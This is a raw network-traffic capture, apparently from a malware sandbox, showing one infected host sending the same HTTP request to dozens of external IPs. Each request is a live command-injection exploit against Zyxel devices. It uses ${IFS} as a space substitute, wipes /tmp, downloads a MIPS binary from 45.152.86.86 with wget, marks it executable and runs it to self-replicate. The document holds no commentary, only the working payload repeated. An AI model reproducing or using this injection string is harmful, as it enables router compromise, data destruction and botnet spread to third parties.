                              Mar 31, 2024 08:41:30.922635078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5292192.168.2.135777847.174.216.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922707081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5293192.168.2.1335900114.248.30.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922775030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5294192.168.2.1352202123.171.1.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922828913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5295192.168.2.134126638.155.199.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922905922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5296192.168.2.135297440.222.224.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.922956944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5297192.168.2.1342004188.185.114.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923038960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5298192.168.2.1333118156.75.3.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923088074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5299192.168.2.1350708213.117.126.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923146009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5300192.168.2.1355084199.15.36.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923227072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5301192.168.2.134613678.124.80.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923279047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5302192.168.2.1334722101.89.208.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923368931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5303192.168.2.136054832.97.180.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923420906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5304192.168.2.1339900120.127.7.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923497915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5305192.168.2.1346596153.59.85.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923569918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5306192.168.2.1345868134.209.32.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923631907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5307192.168.2.1355648216.187.228.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923686028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5308192.168.2.135978091.226.242.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923765898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5309192.168.2.133594061.197.223.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923818111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5310192.168.2.1350346122.169.70.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923898935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5311192.168.2.1353612208.167.129.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923968077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5312192.168.2.1357572129.90.45.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.923998117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5313192.168.2.133300289.231.221.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924081087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5314192.168.2.134004259.188.76.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924134016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5315192.168.2.1336494134.73.181.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924196959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5316192.168.2.1351794177.101.247.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924258947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5317192.168.2.135550223.20.61.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924325943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5318192.168.2.1341992223.212.80.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924366951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5319192.168.2.1335546152.220.89.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924442053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5320192.168.2.1346986137.139.30.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924521923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5321192.168.2.1340012170.138.93.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924573898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5322192.168.2.135187412.14.236.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924626112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5323192.168.2.1347954102.159.147.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924690008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5324192.168.2.13407421.212.160.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924753904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5325192.168.2.135273690.166.68.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924830914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5326192.168.2.1351352132.31.63.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924895048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5327192.168.2.135248680.98.78.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.924968004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5328192.168.2.1358552136.71.135.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925024033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5329192.168.2.134254084.238.93.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925077915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5330192.168.2.133692054.185.63.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925137043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5331192.168.2.1343318131.54.191.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925221920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5332192.168.2.134027823.81.35.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925268888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5333192.168.2.1360830155.236.199.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925333023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5334192.168.2.1341916140.14.43.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925391912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5335192.168.2.134757298.66.158.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925445080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5336192.168.2.1354584193.65.190.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925506115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5337192.168.2.1333638206.61.201.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925578117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5338192.168.2.134312052.164.49.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925647020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5339192.168.2.1342312183.31.103.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925715923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5340192.168.2.1352310184.80.25.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925767899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5341192.168.2.13407104.7.180.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925829887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5342192.168.2.1349112151.38.95.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925873041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5343192.168.2.1349416197.36.79.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.925950050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5344192.168.2.1355602203.147.242.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926034927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5345192.168.2.134894638.126.173.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926076889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5346192.168.2.1340746196.196.46.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926152945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5347192.168.2.135675454.58.174.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926203966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5348192.168.2.1346264194.212.106.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926279068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5349192.168.2.1355854113.192.232.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926358938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5350192.168.2.1349772135.188.250.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926412106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5351192.168.2.133806252.187.149.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926448107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5352192.168.2.1334434208.137.17.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926520109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5353192.168.2.1336580156.89.13.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926588058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5354192.168.2.135466842.3.20.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926656961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5355192.168.2.1340328157.146.3.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926728964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5356192.168.2.135360483.244.180.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926801920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5357192.168.2.1337408204.240.221.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926846981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5358192.168.2.1345130162.171.207.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926913023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5359192.168.2.135438890.223.227.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:30.926971912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5360192.168.2.134710472.178.211.152443
                              TimestampBytes transferredDirectionData
